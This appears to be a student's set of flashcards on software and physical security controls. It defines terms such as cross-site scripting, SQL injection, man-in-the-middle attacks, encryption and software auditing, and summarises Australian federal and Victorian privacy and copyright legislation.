KK1 Physical & Software security controls
A username and password to allow authorized access to a system
What is user authentication?
To review the software for compliance with specific standards.
What is software auditing?
When personal information is accessed, disclosed without authorisation, or is lost.
What are data breaches?
Unsecured web pages, web applications, and web servers running malicious Javascript code.
What is cross-site scripting?
Federal:
- Copyright Act 1968
- Privacy Act 1988
State:
- Privacy & Data Protection Act 2014
- Health Records Act 2001
What legislation are in Federal & State?
Are a category of software tools that help a software team manage changes to source code over time.
Developers upload the updates and changes they make to the source code of applications.
What are version control systems?
A simulated cyber attack against your computer system to check for exploitable vulnerabilities.
What is penetration testing?
Emails used for phishing scams
Breaches of Privacy Law (fines)
Unauthorized access to customer accounts
Loss of reputation with customers
Company collapse
What are the consequences for data breaches?
Allows dynamic and interactive content on HTML/CSS webpages
What is Javascript?
Recognizes that any original work is the property of the person who created it
What is the Copyright Act 1968?
Vulnerabilities to existing systems are constantly identified and a fix is created by the distributors of software.
What are software updates?
Data loss (crashing bugs)
Unauthorised access (lack of security)
Third party service goes offline
Compliance with tech standards
Privacy issues (is data protected?)
Legal issues (Copyright, Privacy)
Licensing (all parts licensed appropriately)
What risks could poorly/malicious code bring?
An attacker ‘spoofs’ an unsecured wifi network that a client connects too
All traffic can be analyzed by the attacker
What is a man-in-the-middle attack?
Sanitize/escape user input to remove special characters associated with JavaScript commands
How do you prevent cross-site scripting?
Rules for the collection, storage & communication of personal information
What is the Privacy Act 1988?
Encoding information so that is unreadable without the use of the encryption key.
What is encryption?
- uncover any issues or problems early; it is simpler and costs less to fix an issue earlier in the project
- improve preformance, scalability and reliability
- review any necessary or unnecessary testing
- ensure the application can be maintained and extended in the future
- make sure you use the apprpriate technology for the job
- satisfy legal and licensing requirements
what is the purpose of software auditing?
Tricking the victim into clicking 'accept' with admin permissions or into giving the attacker physical access to a device.
What is social engineering?
Running malicious SQL commands via unsensitized user input
Allows unauthorized users to add/modify/delete contents of the SQL database
What is an SQL injection?
Collection and handling of health information in public and private sector
What is the Health Records Act 2001?
The receiver (Bob) generates a Public-Private key pair.
Bob gives the sender (Alice) his public key. Bob keeps his private key.
Alice encrypts her data with Bob’s public key, and sends the encrypted data to Bob.
Bob uses his private key to decrypt the data.
What is Asymmetric Encryption?
Usernames / passwords
Personal information
Bank details
Credit card numbers
Health information
What information can be lost in a data breach?
Sanitise/escape user input to remove special characters associated with SQL commands
How do you prevent SQL injections?
Privacy Act equivalent for Victorian government agencies (vic roads, WorkSafe)
What is the Privacy and Data Protection Act 2014?